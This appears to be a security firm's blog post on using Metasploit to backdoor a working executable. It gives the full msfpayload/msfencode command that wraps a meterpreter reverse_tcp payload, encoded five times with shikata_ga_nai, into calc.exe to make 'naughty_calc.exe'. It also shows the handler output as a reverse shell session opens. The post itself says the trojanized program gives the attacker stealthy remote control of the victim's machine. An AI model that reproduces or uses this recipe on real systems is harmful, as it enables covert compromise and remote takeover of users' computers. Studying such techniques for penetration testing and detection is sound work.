Using Metasploit to Backdoor Your Executable
Meta what?
The Metasploit Project is an open-source computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. It's most well-known sub-project is the Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive, and security research.
A few days ago, an update was made to the Metasploit framework that would allow you to msfencode an msfpayload into an existing executable and still have the program function. To refresh your memory, msfencode refers to packing/creating an executable and msfpayload refers to the Metasploit payload.
A Metasploit payload (msfpayload) can be anything from a reverse shell or simply opening up a port on the victim's machine. For example, you can inject an msfpayload into the Windows calculator (calc.exe) and still have the calculator operate as usual without the user's knowledge. So as the user launches the modified calculator program, a VNC server is stealthly executed in the background allowing the attacker remote control of the victim's machine completely unbeknownst to the victim.
New MSFENCODE Options:
-a The architecture to encode as
-b The list of characters to avoid: '\x00\xff'
-c The number of times to encode the data
-e The encoder to use
-h Help banner
-i Encode the contents of the supplied file path
-k Keep template working; run payload in new thread (use with -x)
-l List available encoders
-m Specifies an additional module search path
-n Dump encoder information
-o The output file
-p The platform to encode for
-s The maximum size of the encoded data
-t The format to display the encoded buffer with (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war)
-x Specify an alternate win32 executable template
We as security professionals need to stay current with new up and coming attack surfaces. New developments in the Metasploit framework make our jobs easier. As penetration testers, these innovations help us think outside the box and therefore aid in better securing the organizations who hire us.
---
Using msfencode to inject an msfpayload into calc.exe and outputting to:
naughty_calc.exe
~/rt$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.69 R | ./msfencode -t exe -x calc.exe -k -o naughty_calc.exe -e x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 426 (iteration=5)
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.1.69 LHOST => 192.168.1.69 msf exploit(handler) > exploit [*] Started reverse handler on 192.168.1.69:4444 [*] Starting the payload handler... [*] Sending stage (748032 bytes) [*] Meterpreter session 3 opened (192.168.1.69:4444 -> 192.168.1.69:51695)
Categories
Contact Us
Phone number:
1-612-234-7848
E-mail: